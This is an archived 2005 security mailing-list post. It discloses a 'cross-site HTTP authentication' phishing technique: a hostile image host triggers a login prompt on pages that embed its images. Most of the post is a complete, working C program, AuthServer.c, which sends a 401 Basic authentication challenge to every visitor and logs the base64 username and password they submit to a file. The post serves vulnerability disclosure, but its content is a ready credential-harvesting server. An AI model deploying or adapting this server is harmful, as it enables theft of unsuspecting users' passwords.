[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4ee142450508100918bec9363@mail.gmail.com>
Date: Wed Aug 10 17:19:05 2005
From: justasfire at gmail.com (JustAsFire)
Subject: Cross-site http authentication
Discovered: by JustAsFire JustAsFire@...il.com
Vulnerable: Any web page in which you can insert images hosted on
other servers.
Description: If a web page contains an image from a site which
requires authentication, an Username/Password prompt displaying host
name and authentication realm will appear asking for username and
password. A malicious http server could be used to log the
credientials of the users who would authenticate.
POC:
/*******************************************************************************
***name : AuthServer.c
***author : JustAsFire JustAsFire[at]gmail.com
***description : a very simple web server which sends a 401
Authorization request to anyone
*** connecting to it. If the client authetificates it stores the
username and password
*** in the file userlog(encrypted in base64).
***
***
*********************************************************************************/
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#define MAXPENDING 5
#define BUFFSIZE 10000
void Die(char *mess) { perror(mess); exit(1); }
int GetCredientials(char *buffer){
char s[200], *p;
int i;
FILE *f;
p=strstr(buffer, "Authorization: Basic ");
if (p){
if ( strlen(p)>50 ){
printf("Buffer overflow atempt");
return 0;
}
for (i=0; i+25 < strlen(p); i++)
s[i]=p[21+i];
printf("\n%s\n",s);
f=fopen("userlog", "a");
fprintf(f,"%s\n",s);
fclose(f);
return 1;
}
else return 0;
}
void HandleClient(int sock){
char buffer[BUFFSIZE];
char *s;
if (read(sock, buffer, BUFFSIZE) <0)
Die("Failed to receive bytes from client");
if ( GetCredientials(buffer)==0 ){
char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01
(Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it...
\"\nKeep-Alive: timeout=15, max=100\nConnection:
Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html;
charset=iso-8859-1\n\n";
write(sock,s,strlen(s));
}
close(sock);
}
int main (int argc, char *argv[]) {
int serversock, clientsock;
struct sockaddr_in server, client;
if ( argc != 2 ) {
fprintf(stderr, "USAGE: AuthServer <port>\n");
exit(1);
}
if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
Die("Failed to create socket");
}
memset(&server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = htons(atoi(argv[1]));
if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) {
Die("Failed to bind the server socket");
}
if (listen(serversock, MAXPENDING) < 0) {
Die("Failed to listen on server socket");
}
fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n");
fprintf(stdout,"Listening for connections...\n");
while (1) {
unsigned int clientlen = sizeof(client);
if ((clientsock = accept(serversock, (struct sockaddr
*) &client, &clientlen)) < 0) {
Die("Failed to accept client connection");
}
fprintf(stdout, "Client connected: %s\n",
inet_ntoa(client.sin_addr));
HandleClient(clientsock);
}
}
Powered by blists - more mailing lists